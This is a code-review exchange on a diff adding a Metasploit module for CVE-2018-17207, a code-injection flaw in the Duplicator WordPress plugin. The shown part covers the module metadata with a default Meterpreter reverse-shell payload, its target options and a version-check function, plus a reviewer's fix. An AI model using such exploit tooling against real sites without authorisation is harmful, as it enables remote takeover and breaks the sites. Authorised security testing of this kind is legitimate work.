modules/exploits/multi/php/wordpress_duplicator.rb

```diff
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking # this module overwrites the configuration file, breaking the website
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Snap Creek Duplicator WordPress plugin code injection',
+      'Description'     => %q{
+        When the WordPress plugin Snap Creek Duplicator restores a backup, it 
+        leaves dangerous files in the filesystem such as installer.php and
+        installer-backup.php. These files allow anyone to call a function that
+        overwrite the wp-config.php file AND this function does not sanitize
+        POST parameters before inserting them inside the wp-config.php file,
+        leading to arbitrary PHP code execution.
+        WARNING: This exploit WILL break the wp-config.php file. If possible try
+        to restore backups of the configuration after the exploit to make the
+        WordPress site work again.
+      },
+      'Author'          => [
+        'Julien Legras <julien.legras@synacktiv.com>',
+        'Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>'
+      ],
+      'References'     => [
+        ['URL', 'https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf'],
+        ['WPVDB', '9123'],
+        ['CVE', '2018-17207']
+      ],
+      'License'         => MSF_LICENSE,
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 29 2018',
+      'DefaultOptions'  =>
+      {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress Duplicator <= 1.2.40', {}]],
+      'DefaultTarget'   => 0))
+
+    register_options([
+      OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
+      ])
+  end
+
+  def check
+    tpath = normalize_uri(datastore['TARGETURI'])
+
+    print_status("Checking URI #{rhost+tpath}")
+    response = send_request_cgi({ 'uri' => tpath})
+    version = response.body.to_s.scan( /version: ([^<]*)</).last.first
```

Comment:
The response is still being accessed here and can produce an error. 

Try doing something like:

```
    def check
      tpath = normalize_uri(datastore['TARGETURI'])
        
      print_status("Checking URI #{rhost+tpath}")
      response = send_request_cgi({ 'uri' => tpath})
      return Exploit::CheckCode::Unknown unless response
        
      version = response.body.to_s.scan( /version: ([^<]*)</).last.first
      if response.code == 200
          return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new("1.2.40")
          return Exploit::CheckCode::Detected
      end

      Exploit::CheckCode::Safe
    end
```

Reply:
Fixed